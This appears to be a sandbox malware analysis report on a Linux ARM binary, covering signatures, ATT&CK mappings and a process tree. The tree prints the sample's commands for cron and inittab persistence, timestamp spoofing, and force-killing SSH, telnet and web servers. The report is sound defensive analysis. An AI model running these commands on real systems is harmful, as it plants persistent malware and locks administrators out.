7217b974542ea8e3d69211c4280f10b451f0a5d9df60a8ea091d89aa73a78160

Analysis

max time kernel
151s
max time network
154s
platform
debian-9_armhf
resource
debian9-armhf-20221125-en
resource tags

arch:armhfimage:debian9-armhf-20221125-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
29-08-2023 08:23

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

7217b974542ea8e3d69211c4280f10b451f0a5d9df60a8ea091d89aa73a78160
Size

605KB
MD5

ef717a601f11e805a0d67e49a79ad602
SHA1

17c25a39fc5faa931e1e99338c530b801f22397a
SHA256

7217b974542ea8e3d69211c4280f10b451f0a5d9df60a8ea091d89aa73a78160
SHA512

dcb245a5769bc921cabee37efdbaa71e5adb4f3637014d18d5de2dbf039d49b773875a25d6bb5a221614890fd3fb725a77aa2c92160379061058a5a10094a886
SSDEEP

12288:ZC1aCpxcLoP5fx5+rTGHqlXqDqPZyG65+jZvG0XqndyK7xTSZa6tdp:qbccP5Z5+rTGKlMqr65gZvG0XsdyJYw

Score

8^/10

discovery persistence

Malware Config

Signatures

Contacts a large (812) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

Creates/modifies Cron job 1 TTPs 1 IoCs

Cron allows running tasks on a schedule, and is commonly used for malware persistence.

persistence

Scheduled Task/Job

T1053

description	ioc	Process
File opened for modification	/var/spool/cron/crontabs/tmp.L37LjE	crontab

Enumerates kernel/hardware configuration 1 TTPs 64 IoCs

Reads contents of /sys virtual filesystem to enumerate system information.

System Information Discovery

T1082

description	ioc	Process
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

description	ioc	Process
File opened for reading	/proc/filesystems	systemctl
File opened for reading	/proc/1/environ	systemctl
File opened for reading	/proc/filesystems	systemctl
File opened for reading	/proc/filesystems	systemctl
File opened for reading	/proc/cmdline	systemctl
File opened for reading	/proc/self/stat	systemctl
File opened for reading	/proc/1/environ	systemctl
File opened for reading	/proc/cmdline	systemctl
File opened for reading	/proc/1/environ	systemctl
File opened for reading	/proc/cmdline	systemctl
File opened for reading	/proc/filesystems	systemctl
File opened for reading	/proc/filesystems	systemctl
File opened for reading	/proc/cmdline	systemctl
File opened for reading	/proc/self/stat	systemctl
File opened for reading	/proc/1/environ	systemctl
File opened for reading	/proc/1/environ	systemctl
File opened for reading	/proc/cmdline	systemctl
File opened for reading	/proc/filesystems	systemctl
File opened for reading	/proc/1/environ	systemctl
File opened for reading	/proc/1/environ	systemctl
File opened for reading	/proc/cmdline	systemctl
File opened for reading	/proc/cmdline	systemctl
File opened for reading	/proc/cmdline	systemctl
File opened for reading	/proc/cmdline	systemctl
File opened for reading	/proc/cmdline	systemctl
File opened for reading	/proc/cmdline	systemctl
File opened for reading	/proc/1/environ	systemctl
File opened for reading	/proc/self/stat	systemctl
File opened for reading	/proc/cmdline	systemctl
File opened for reading	/proc/filesystems	systemctl
File opened for reading	/proc/cmdline	systemctl
File opened for reading	/proc/filesystems	systemctl
File opened for reading	/proc/cmdline	systemctl
File opened for reading	/proc/filesystems	systemctl
File opened for reading	/proc/filesystems	systemctl
File opened for reading	/proc/1/environ	systemctl
File opened for reading	/proc/1/environ	systemctl
File opened for reading	/proc/self/stat	systemctl
File opened for reading	/proc/filesystems	sed
File opened for reading	/proc/1/environ	systemctl
File opened for reading	/proc/filesystems	systemctl
File opened for reading	/proc/cmdline	systemctl
File opened for reading	/proc/filesystems	systemctl
File opened for reading	/proc/self/stat	systemctl
File opened for reading	/proc/self/stat	systemctl
File opened for reading	/proc/cmdline	systemctl
File opened for reading	/proc/1/environ	systemctl
File opened for reading	/proc/1/environ	systemctl
File opened for reading	/proc/1/environ	systemctl
File opened for reading	/proc/1/environ	systemctl
File opened for reading	/proc/1/environ	systemctl
File opened for reading	/proc/filesystems	systemctl
File opened for reading	/proc/cmdline	systemctl
File opened for reading	/proc/cmdline	systemctl
File opened for reading	/proc/filesystems	systemctl
File opened for reading	/proc/filesystems	systemctl
File opened for reading	/proc/filesystems	systemctl
File opened for reading	/proc/filesystems	systemctl
File opened for reading	/proc/cmdline	systemctl
File opened for reading	/proc/1/environ	systemctl
File opened for reading	/proc/self/stat	systemctl
File opened for reading	/proc/self/stat	systemctl
File opened for reading	/proc/cmdline	systemctl
File opened for reading	/proc/1/environ	systemctl

/tmp/7217b974542ea8e3d69211c4280f10b451f0a5d9df60a8ea091d89aa73a78160
/tmp/7217b974542ea8e3d69211c4280f10b451f0a5d9df60a8ea091d89aa73a78160
1⤵
PID:363
- /bin/sh
  sh -c "touch -acmr /bin/ls /tmp/7217b974542ea8e3d69211c4280f10b451f0a5d9df60a8ea091d89aa73a78160"
  2⤵
  PID:365
- - /usr/bin/touch
    touch -acmr /bin/ls /tmp/7217b974542ea8e3d69211c4280f10b451f0a5d9df60a8ea091d89aa73a78160
    3⤵
    PID:369
- /bin/sh
  sh -c "(crontab -l | grep -v \"/tmp/7217b974542ea8e3d69211c4280f10b451f0a5d9df60a8ea091d89aa73a78160\" | grep -v \"no cron\" | grep -v \"lesshts/run.sh\" > /var/run/.x00740882966) > /dev/null 2>&1"
  2⤵
  PID:370
- /bin/sh
  sh -c "echo \"* * * * * /tmp/7217b974542ea8e3d69211c4280f10b451f0a5d9df60a8ea091d89aa73a78160 > /dev/null 2>&1 &\" >> /var/run/.x00740882966"
  2⤵
  PID:376
- /bin/sh
  sh -c "crontab /var/run/.x00740882966"
  2⤵
  PID:377
- - /usr/bin/crontab
    crontab /var/run/.x00740882966
    3⤵
    - Creates/modifies Cron job
    PID:378
- /bin/sh
  sh -c "rm -rf /var/run/.x00740882966"
  2⤵
  PID:379
- - /bin/rm
    rm -rf /var/run/.x00740882966
    3⤵
    PID:380
- /bin/sh
  sh -c "cat /etc/inittab | grep -v \"/tmp/7217b974542ea8e3d69211c4280f10b451f0a5d9df60a8ea091d89aa73a78160\" > /etc/inittab2"
  2⤵
  PID:381
- - /bin/cat
    cat /etc/inittab
    3⤵
    PID:382
- - /bin/grep
    grep -v /tmp/7217b974542ea8e3d69211c4280f10b451f0a5d9df60a8ea091d89aa73a78160
    3⤵
    PID:383
- /bin/sh
  sh -c "echo \"0:2345:respawn:/tmp/7217b974542ea8e3d69211c4280f10b451f0a5d9df60a8ea091d89aa73a78160\" >> /etc/inittab2"
  2⤵
  PID:384
- /bin/sh
  sh -c "cat /etc/inittab2 > /etc/inittab"
  2⤵
  PID:385
- - /bin/cat
    cat /etc/inittab2
    3⤵
    PID:386
- /bin/sh
  sh -c "rm -rf /etc/inittab2"
  2⤵
  PID:387
- - /bin/rm
    rm -rf /etc/inittab2
    3⤵
    PID:388
- /bin/sh
  sh -c "touch -acmr /bin/ls /etc/inittab"
  2⤵
  PID:389
- - /usr/bin/touch
    touch -acmr /bin/ls /etc/inittab
    3⤵
    PID:390

/usr/bin/crontab
crontab -l
1⤵
PID:372

/bin/grep
grep -v /tmp/7217b974542ea8e3d69211c4280f10b451f0a5d9df60a8ea091d89aa73a78160
1⤵
PID:373

/bin/grep
grep -v "no cron"
1⤵
PID:374

/bin/grep
grep -v lesshts/run.sh
1⤵
PID:375

/bin/sh
sh -c "/bin/uname -n"
1⤵
PID:392
- /bin/uname
  /bin/uname -n
  2⤵
  PID:393

/bin/sh
sh -c "/bin/uname -n"
1⤵
PID:394
- /bin/uname
  /bin/uname -n
  2⤵
  PID:395

/bin/sh
sh -c "/bin/uname -n"
1⤵
PID:396
- /bin/uname
  /bin/uname -n
  2⤵
  PID:397

/bin/sh
sh -c "kill -9 `cat /var/run/httpd.pid` > /dev/null 2>&1 &"
1⤵
PID:398

/bin/sh
sh -c "service httpd stop > /dev/null 2>&1 &"
1⤵
PID:400

/bin/cat
cat /var/run/httpd.pid
1⤵
PID:401

/bin/sh
sh -c "killall -9 mini_httpd > /dev/null 2>&1 &"
1⤵
PID:403

/usr/sbin/service
service httpd stop
1⤵
PID:402
- /usr/bin/basename
  basename /usr/sbin/service
  2⤵
  PID:406
- /usr/bin/basename
  basename /usr/sbin/service
  2⤵
  PID:409
- /bin/systemctl
  systemctl --quiet is-active multi-user.target
  2⤵
  PID:413
- /bin/systemctl
  systemctl -p Triggers show dbus.socket
  2⤵
  - Reads runtime system information
  PID:440
- /bin/systemctl
  systemctl -p Triggers show ssh.socket
  2⤵
  - Reads runtime system information
  PID:447
- /bin/systemctl
  systemctl -p Triggers show syslog.socket
  2⤵
  - Enumerates kernel/hardware configuration
  - Reads runtime system information
  PID:452
- /bin/systemctl
  systemctl -p Triggers show systemd-fsckd.socket
  2⤵
  - Enumerates kernel/hardware configuration
  - Reads runtime system information
  PID:455
- /bin/systemctl
  systemctl -p Triggers show systemd-initctl.socket
  2⤵
  - Enumerates kernel/hardware configuration
  - Reads runtime system information
  PID:458
- /bin/systemctl
  systemctl -p Triggers show systemd-journald-audit.socket
  2⤵
  - Enumerates kernel/hardware configuration
  - Reads runtime system information
  PID:464
- /bin/systemctl
  systemctl -p Triggers show systemd-journald-dev-log.socket
  2⤵
  - Enumerates kernel/hardware configuration
  - Reads runtime system information
  PID:467
- /bin/systemctl
  systemctl -p Triggers show systemd-journald.socket
  2⤵
  - Enumerates kernel/hardware configuration
  - Reads runtime system information
  PID:471
- /bin/systemctl
  systemctl -p Triggers show systemd-networkd.socket
  2⤵
  - Enumerates kernel/hardware configuration
  - Reads runtime system information
  PID:476
- /bin/systemctl
  systemctl -p Triggers show systemd-rfkill.socket
  2⤵
  - Enumerates kernel/hardware configuration
  PID:479
- /bin/systemctl
  systemctl -p Triggers show systemd-udevd-control.socket
  2⤵
  - Enumerates kernel/hardware configuration
  - Reads runtime system information
  PID:482
- /bin/systemctl
  systemctl -p Triggers show systemd-udevd-kernel.socket
  2⤵
  - Enumerates kernel/hardware configuration
  PID:485

/bin/sh
sh -c "killall -9 minihttpd > /dev/null 2>&1 &"
1⤵
PID:405

/bin/sh
sh -c "kill -9 `cat /var/run/thttpd.pid` > /dev/null 2>&1 &"
1⤵
PID:408

/bin/sh
sh -c "nvram set httpd_enable=0 > /dev/null 2>&1"
1⤵
PID:412

/bin/cat
cat /var/run/thttpd.pid
1⤵
PID:411

/bin/sh
sh -c "nvram set http_enable=0 > /dev/null 2>&1"
1⤵
PID:414

/bin/sh
sh -c "killall -9 httpd > /dev/null 2>&1 &"
1⤵
PID:415

/bin/sh
sh -c "service telnetd stop > /dev/null 2>&1 &"
1⤵
PID:417

/bin/systemctl
systemctl list-unit-files --full "--type=socket"
1⤵
- Enumerates kernel/hardware configuration
PID:419

/bin/sh
sh -c "service sshd stop > /dev/null 2>&1 &"
1⤵
PID:422

/bin/sed
sed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"
1⤵
PID:421

/usr/sbin/service
service telnetd stop
1⤵
PID:420
- /usr/bin/basename
  basename /usr/sbin/service
  2⤵
  PID:425
- /usr/bin/basename
  basename /usr/sbin/service
  2⤵
  PID:428
- /bin/systemctl
  systemctl --quiet is-active multi-user.target
  2⤵
  - Enumerates kernel/hardware configuration
  - Reads runtime system information
  PID:433
- /bin/systemctl
  systemctl -p Triggers show dbus.socket
  2⤵
  - Enumerates kernel/hardware configuration
  PID:449
- /bin/systemctl
  systemctl -p Triggers show ssh.socket
  2⤵
  - Enumerates kernel/hardware configuration
  - Reads runtime system information
  PID:453
- /bin/systemctl
  systemctl -p Triggers show syslog.socket
  2⤵
  - Reads runtime system information
  PID:456
- /bin/systemctl
  systemctl -p Triggers show systemd-fsckd.socket
  2⤵
  - Enumerates kernel/hardware configuration
  PID:459
- /bin/systemctl
  systemctl -p Triggers show systemd-initctl.socket
  2⤵
  - Enumerates kernel/hardware configuration
  - Reads runtime system information
  PID:461
- /bin/systemctl
  systemctl -p Triggers show systemd-journald-audit.socket
  2⤵
  - Enumerates kernel/hardware configuration
  - Reads runtime system information
  PID:463
- /bin/systemctl
  systemctl -p Triggers show systemd-journald-dev-log.socket
  2⤵
  - Enumerates kernel/hardware configuration
  - Reads runtime system information
  PID:466
- /bin/systemctl
  systemctl -p Triggers show systemd-journald.socket
  2⤵
  - Enumerates kernel/hardware configuration
  PID:469
- /bin/systemctl
  systemctl -p Triggers show systemd-networkd.socket
  2⤵
  - Enumerates kernel/hardware configuration
  - Reads runtime system information
  PID:475
- /bin/systemctl
  systemctl -p Triggers show systemd-rfkill.socket
  2⤵
  PID:478
- /bin/systemctl
  systemctl -p Triggers show systemd-udevd-control.socket
  2⤵
  - Enumerates kernel/hardware configuration
  PID:481
- /bin/systemctl
  systemctl -p Triggers show systemd-udevd-kernel.socket
  2⤵
  - Reads runtime system information
  PID:484

/bin/sh
sh -c "killall -9 telnetd > /dev/null 2>&1 &"
1⤵
PID:424

/usr/sbin/service
service sshd stop
1⤵
PID:423
- /usr/bin/basename
  basename /usr/sbin/service
  2⤵
  PID:429
- /usr/bin/basename
  basename /usr/sbin/service
  2⤵
  PID:431
- /bin/systemctl
  systemctl --quiet is-active multi-user.target
  2⤵
  - Enumerates kernel/hardware configuration
  - Reads runtime system information
  PID:434
- /bin/systemctl
  systemctl -p Triggers show dbus.socket
  2⤵
  - Enumerates kernel/hardware configuration
  - Reads runtime system information
  PID:450
- /bin/systemctl
  systemctl -p Triggers show ssh.socket
  2⤵
  - Enumerates kernel/hardware configuration
  PID:454
- /bin/systemctl
  systemctl -p Triggers show syslog.socket
  2⤵
  PID:457
- /bin/systemctl
  systemctl -p Triggers show systemd-fsckd.socket
  2⤵
  PID:460
- /bin/systemctl
  systemctl -p Triggers show systemd-initctl.socket
  2⤵
  - Reads runtime system information
  PID:462
- /bin/systemctl
  systemctl -p Triggers show systemd-journald-audit.socket
  2⤵
  - Enumerates kernel/hardware configuration
  - Reads runtime system information
  PID:465
- /bin/systemctl
  systemctl -p Triggers show systemd-journald-dev-log.socket
  2⤵
  - Enumerates kernel/hardware configuration
  PID:468
- /bin/systemctl
  systemctl -p Triggers show systemd-journald.socket
  2⤵
  - Reads runtime system information
  PID:473
- /bin/systemctl
  systemctl -p Triggers show systemd-networkd.socket
  2⤵
  - Reads runtime system information
  PID:477
- /bin/systemctl
  systemctl -p Triggers show systemd-rfkill.socket
  2⤵
  PID:480
- /bin/systemctl
  systemctl -p Triggers show systemd-udevd-control.socket
  2⤵
  - Enumerates kernel/hardware configuration
  PID:483
- /bin/systemctl
  systemctl -p Triggers show systemd-udevd-kernel.socket
  2⤵
  - Enumerates kernel/hardware configuration
  - Reads runtime system information
  PID:486

/bin/sh
sh -c "killall -9 utelnetd > /dev/null 2>&1 &"
1⤵
PID:427

/bin/sh
sh -c "killall -9 dropbear > /dev/null 2>&1 &"
1⤵
PID:432

/bin/sh
sh -c "killall -9 sshd > /dev/null 2>&1 &"
1⤵
PID:436

/bin/sh
sh -c "killall -9 lighttpd > /dev/null 2>&1 &"
1⤵
PID:438

/bin/systemctl
systemctl list-unit-files --full "--type=socket"
1⤵
- Enumerates kernel/hardware configuration
PID:443

/bin/systemctl
systemctl list-unit-files --full "--type=socket"
1⤵
- Enumerates kernel/hardware configuration
PID:444

/bin/sed
sed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"
1⤵
- Reads runtime system information
PID:445

/bin/sed
sed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"
1⤵
PID:446

/usr/local/sbin/systemctl
systemctl stop httpd.service
1⤵
PID:402

/usr/local/bin/systemctl
systemctl stop httpd.service
1⤵
PID:402

/usr/sbin/systemctl
systemctl stop httpd.service
1⤵
PID:402

/usr/bin/systemctl
systemctl stop httpd.service
1⤵
PID:402

/sbin/systemctl
systemctl stop httpd.service
1⤵
PID:402

/bin/systemctl
systemctl stop httpd.service
1⤵
- Enumerates kernel/hardware configuration
PID:402

/usr/local/sbin/systemctl
systemctl stop telnetd.service
1⤵
PID:420

/usr/local/bin/systemctl
systemctl stop telnetd.service
1⤵
PID:420

/usr/sbin/systemctl
systemctl stop telnetd.service
1⤵
PID:420

/usr/bin/systemctl
systemctl stop telnetd.service
1⤵
PID:420

/sbin/systemctl
systemctl stop telnetd.service
1⤵
PID:420

/bin/systemctl
systemctl stop telnetd.service
1⤵
- Reads runtime system information
PID:420

/usr/local/sbin/systemctl
systemctl stop sshd.service
1⤵
PID:423

/usr/local/bin/systemctl
systemctl stop sshd.service
1⤵
PID:423

/usr/sbin/systemctl
systemctl stop sshd.service
1⤵
PID:423

/usr/bin/systemctl
systemctl stop sshd.service
1⤵
PID:423

/sbin/systemctl
systemctl stop sshd.service
1⤵
PID:423

/bin/systemctl
systemctl stop sshd.service
1⤵
- Reads runtime system information
PID:423

/bin/sh
sh -c "export PATH=/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin;( kill -9 `cat /var/run/dropbear.pid` `cat /var/run/sshd.pid` ; killall -9 tty0 tty1 tty4 tty5 tty6 sshd dropbear ; /etc/init.d/dropbear stop ; rm -rf /var/run/tt* /tmp/tt* )>/dev/null 2>&1 & "
1⤵
PID:496

/bin/cat
cat /var/run/dropbear.pid
1⤵
PID:498

/bin/cat
cat /var/run/sshd.pid
1⤵
PID:499

/etc/init.d/dropbear
/etc/init.d/dropbear stop
1⤵
PID:500

/bin/rm
rm -rf "/var/run/tt*" "/tmp/tt*"
1⤵
PID:497

/bin/sh
sh -c "export PATH=/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin;(service dropbear stop ; service uhttpd stop ; service sshd stop )>/dev/null 2>&1 & "
1⤵
PID:502

/usr/sbin/service
service dropbear stop
1⤵
PID:504
- /usr/bin/basename
  basename /usr/sbin/service
  2⤵
  PID:505
- /usr/bin/basename
  basename /usr/sbin/service
  2⤵
  PID:506
- /bin/systemctl
  systemctl --quiet is-active multi-user.target
  2⤵
  - Enumerates kernel/hardware configuration
  PID:507
- /bin/systemctl
  systemctl -p Triggers show dbus.socket
  2⤵
  - Enumerates kernel/hardware configuration
  - Reads runtime system information
  PID:511
- /bin/systemctl
  systemctl -p Triggers show ssh.socket
  2⤵
  PID:512
- /bin/systemctl
  systemctl -p Triggers show syslog.socket
  2⤵
  - Enumerates kernel/hardware configuration
  - Reads runtime system information
  PID:513
- /bin/systemctl
  systemctl -p Triggers show systemd-fsckd.socket
  2⤵
  - Enumerates kernel/hardware configuration
  PID:514
- /bin/systemctl
  systemctl -p Triggers show systemd-initctl.socket
  2⤵
  - Enumerates kernel/hardware configuration
  - Reads runtime system information
  PID:515
- /bin/systemctl
  systemctl -p Triggers show systemd-journald-audit.socket
  2⤵
  - Enumerates kernel/hardware configuration
  - Reads runtime system information
  PID:516
- /bin/systemctl
  systemctl -p Triggers show systemd-journald-dev-log.socket
  2⤵
  - Enumerates kernel/hardware configuration
  - Reads runtime system information
  PID:517
- /bin/systemctl
  systemctl -p Triggers show systemd-journald.socket
  2⤵
  - Reads runtime system information
  PID:518
- /bin/systemctl
  systemctl -p Triggers show systemd-networkd.socket
  2⤵
  - Enumerates kernel/hardware configuration
  PID:519
- /bin/systemctl
  systemctl -p Triggers show systemd-rfkill.socket
  2⤵
  - Enumerates kernel/hardware configuration
  PID:520
- /bin/systemctl
  systemctl -p Triggers show systemd-udevd-control.socket
  2⤵
  - Enumerates kernel/hardware configuration
  PID:521
- /bin/systemctl
  systemctl -p Triggers show systemd-udevd-kernel.socket
  2⤵
  PID:522

/bin/systemctl
systemctl list-unit-files --full "--type=socket"
1⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:509

/bin/sed
sed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"
1⤵
PID:510

/bin/systemctl
systemctl stop dropbear.service
1⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:504

/usr/sbin/service
service uhttpd stop
1⤵
PID:523
- /usr/bin/basename
  basename /usr/sbin/service
  2⤵
  PID:524
- /usr/bin/basename
  basename /usr/sbin/service
  2⤵
  PID:525
- /bin/systemctl
  systemctl --quiet is-active multi-user.target
  2⤵
  - Reads runtime system information
  PID:526
- /bin/systemctl
  systemctl -p Triggers show dbus.socket
  2⤵
  - Enumerates kernel/hardware configuration
  - Reads runtime system information
  PID:530
- /bin/systemctl
  systemctl -p Triggers show ssh.socket
  2⤵
  PID:531
- /bin/systemctl
  systemctl -p Triggers show syslog.socket
  2⤵
  - Enumerates kernel/hardware configuration
  PID:532
- /bin/systemctl
  systemctl -p Triggers show systemd-fsckd.socket
  2⤵
  - Reads runtime system information
  PID:533
- /bin/systemctl
  systemctl -p Triggers show systemd-initctl.socket
  2⤵
  - Enumerates kernel/hardware configuration
  - Reads runtime system information
  PID:534
- /bin/systemctl
  systemctl -p Triggers show systemd-journald-audit.socket
  2⤵
  - Enumerates kernel/hardware configuration
  - Reads runtime system information
  PID:535
- /bin/systemctl
  systemctl -p Triggers show systemd-journald-dev-log.socket
  2⤵
  - Enumerates kernel/hardware configuration
  - Reads runtime system information
  PID:536
- /bin/systemctl
  systemctl -p Triggers show systemd-journald.socket
  2⤵
  PID:537
- /bin/systemctl
  systemctl -p Triggers show systemd-networkd.socket
  2⤵
  - Reads runtime system information
  PID:538
- /bin/systemctl
  systemctl -p Triggers show systemd-rfkill.socket
  2⤵
  - Enumerates kernel/hardware configuration
  PID:540
- /bin/systemctl
  systemctl -p Triggers show systemd-udevd-control.socket
  2⤵
  - Enumerates kernel/hardware configuration
  - Reads runtime system information
  PID:542
- /bin/systemctl
  systemctl -p Triggers show systemd-udevd-kernel.socket
  2⤵
  - Enumerates kernel/hardware configuration
  PID:543

/bin/systemctl
systemctl list-unit-files --full "--type=socket"
1⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:528

/bin/sed
sed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"
1⤵
PID:529

/bin/systemctl
systemctl stop uhttpd.service
1⤵
- Enumerates kernel/hardware configuration
PID:523

/usr/sbin/service
service sshd stop
1⤵
PID:503
- /usr/bin/basename
  basename /usr/sbin/service
  2⤵
  PID:544
- /usr/bin/basename
  basename /usr/sbin/service
  2⤵
  PID:545
- /bin/systemctl
  systemctl --quiet is-active multi-user.target
  2⤵
  - Enumerates kernel/hardware configuration
  PID:546
- /bin/systemctl
  systemctl -p Triggers show dbus.socket
  2⤵
  - Reads runtime system information
  PID:550
- /bin/systemctl
  systemctl -p Triggers show ssh.socket
  2⤵
  PID:551
- /bin/systemctl
  systemctl -p Triggers show syslog.socket
  2⤵
  PID:552
- /bin/systemctl
  systemctl -p Triggers show systemd-fsckd.socket
  2⤵
  - Enumerates kernel/hardware configuration
  PID:553
- /bin/systemctl
  systemctl -p Triggers show systemd-initctl.socket
  2⤵
  - Enumerates kernel/hardware configuration
  PID:554
- /bin/systemctl
  systemctl -p Triggers show systemd-journald-audit.socket
  2⤵
  - Enumerates kernel/hardware configuration
  PID:555
- /bin/systemctl
  systemctl -p Triggers show systemd-journald-dev-log.socket
  2⤵
  - Enumerates kernel/hardware configuration
  PID:556
- /bin/systemctl
  systemctl -p Triggers show systemd-journald.socket
  2⤵
  - Enumerates kernel/hardware configuration
  PID:557
- /bin/systemctl
  systemctl -p Triggers show systemd-networkd.socket
  2⤵
  - Reads runtime system information
  PID:558
- /bin/systemctl
  systemctl -p Triggers show systemd-rfkill.socket
  2⤵
  - Enumerates kernel/hardware configuration
  PID:559
- /bin/systemctl
  systemctl -p Triggers show systemd-udevd-control.socket
  2⤵
  - Enumerates kernel/hardware configuration
  PID:560
- /bin/systemctl
  systemctl -p Triggers show systemd-udevd-kernel.socket
  2⤵
  - Enumerates kernel/hardware configuration
  - Reads runtime system information
  PID:561

/bin/systemctl
systemctl list-unit-files --full "--type=socket"
1⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:548

/bin/sed
sed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"
1⤵
PID:549

/bin/systemctl
systemctl stop sshd.service
1⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:503

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

Credential Access

Discovery

Network Service Discovery

T1046

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/etc/inittab

Filesize
85B

MD5
bd34a09cbf11186e9b1db9a4a21a6937

SHA1
cbea53d156aafb26c6e2c3f71c5c2d0ba99334d8

SHA256
0373a42e63e9875c52597d1d5b2c2088d3b9f0c07c131a9deaf746f2846f08c5

SHA512
8510602e53c1a481ef19036e7cd39cfe9df1e999074350ff62743219bea36db3bf80f10f6f445dda42641ea8b4c9cbde8feee499f09ed0900ad1ae1104453283

Download Submit
/etc/inittab2

Filesize
85B

MD5
bd34a09cbf11186e9b1db9a4a21a6937

SHA1
cbea53d156aafb26c6e2c3f71c5c2d0ba99334d8

SHA256
0373a42e63e9875c52597d1d5b2c2088d3b9f0c07c131a9deaf746f2846f08c5

SHA512
8510602e53c1a481ef19036e7cd39cfe9df1e999074350ff62743219bea36db3bf80f10f6f445dda42641ea8b4c9cbde8feee499f09ed0900ad1ae1104453283

Download Submit
/run/.x00740882966

Filesize
99B

MD5
99d539edd66c5f0732b8c70b9daa106b

SHA1
9118858de2b9aa3d8d0032c391a0eac9f75d4dda

SHA256
187f7a4acddd08f8c1cb3525fcdcc5c819d35a4957150ee5cee9425960f9aced

SHA512
f119d1ce7e5e92c9babfed2f1f91df85aca08215ab58dd73531b505bc6b62873a8500276c903f53666f24f1591ed0fcb750f34e3d638178ff93adb0177da88eb

Download Submit
/var/spool/cron/crontabs/tmp.L37LjE

Filesize
295B

MD5
80cfb4de46abf0131bb2a7621624a371

SHA1
